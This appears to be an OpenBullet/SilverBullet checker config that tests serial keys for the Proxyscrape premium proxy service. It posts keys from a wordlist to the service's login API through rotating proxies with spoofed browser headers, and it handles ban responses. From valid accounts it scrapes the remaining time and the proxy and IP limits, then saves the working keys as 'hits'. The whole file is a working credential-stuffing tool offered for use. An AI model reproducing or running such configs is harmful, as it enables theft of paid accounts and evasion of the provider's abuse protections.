[SETTINGS]
{
  "Name": "Proxyscrape Premium {Web api}",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2021-07-12T15:00:15.6597985+05:30",
  "AdditionalInfo": "Config By @JustDaixD",
  "RequiredPlugins": [],
  "Author": "Just Dai xD",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": true,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Proxyscrape Key",
  "AllowedWordlist2": "Proxyscrape Key",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Proxyscrape Premium {Web api}",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#ua FUNCTION GetRandomUA -> VAR "ua" 

#login REQUEST POST "https://api.proxyscrape.com/v2/account/login" 
  CONTENT "key=<COD>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: api.proxyscrape.com" 
  HEADER "Origin: https://dashboard.proxyscrape.com" 
  HEADER "Referer: https://dashboard.proxyscrape.com/" 
  HEADER "sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: <ua>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Please provide a valid serial key." 
    KEY "The provided serial key has an invalid format." 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Expired serial key" 
    KEY "Key has expired." 
  KEYCHAIN Ban OR 
    KEY "you have been blocked due too many failed login attempts." 
  KEYCHAIN Success OR 
    KEY "class=\"nav-link\" href=\"/logout" 

#EXPIRY PARSE "<SOURCE>" LR "<h3 class=\"mb-0\">" "</h3>" CreateEmpty=FALSE -> CAP "Time remaining" 

#Proxies PARSE "<SOURCE>" LR "<h6 class=\"text-muted font-weight-bolder\">Proxies</h6>" "</h3>" -> VAR "Proxies" 

FUNCTION Replace "<h3 class=\"mb-0\">" "" "<Proxies>" -> CAP "Proxies" 

FUNCTION Replace " " "" "<Proxies>" -> CAP "Proxies" 

PARSE "<SOURCE>" LR "<h6 class=\"text-muted font-weight-bolder\">Maximum authenticated IPs</h6>" "</h3>" -> VAR "Maximum authenticated IP" 

FUNCTION Replace "<h3 class=\"mb-0\">" "" "<Maximum authenticated IP>" -> CAP "Maximum authenticated IP" 

#Config_By FUNCTION Constant "@JustDaixD" -> CAP "Config By" 

UTILITY File "PROXYSCRAPE PREMIUM.txt" AppendLines "<COD> | Time remaining = <Time remaining> | Proxies = <Proxies> | Maximum authenticated IP = <Maximum authenticated IP> | Config By = @JustDaixD" -> VAR "Save Hits" 

